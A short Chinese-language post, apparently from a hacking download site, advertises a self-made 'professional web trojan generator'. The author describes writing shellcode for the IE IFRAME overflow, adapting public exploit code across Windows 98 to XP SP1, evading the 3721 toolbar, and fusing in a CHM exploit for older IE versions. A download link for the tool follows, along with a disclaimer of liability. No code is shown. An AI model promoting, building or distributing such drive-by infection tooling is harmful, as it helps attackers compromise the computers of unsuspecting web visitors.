当IFRAME溢出公布后,我为了能利用此漏洞做出来令自己满意的网页木马,开始接触溢出,通过几天的反复跟踪测试,并参考网上已发布的利用代码,自己写了个shellcode,并对网上公布的利用代码进行了修改,使得其能顺利的工作在win98、winme、win2000、winXP sp1系统ie6.0下,优化后的内存占用为网上公布代码的一半,并采用线程结束,利用特殊的IE窗口再绕过3721的同时,使ie本身不会被关闭,总算做到了令自己满意的程度,而为了能工作在IE5.0 IE5.5下,我把原"超级木马"所利用的CHM漏洞和其融合为一体,最后利用asm+Html+js写成此生成器,由于其危害很大,请各位网友小心使用,非法使用造成的后果请自行承担,关于此生成器的使用,本人不承担说明义务。
专业版网页木马生成器界面预览
screen.width-300)this.width=screen.width-300" border=0>
下载地址: http://down1.hoky.org/0503/专业版网页木马生成器.rar
(出处:http://www.sheup.com)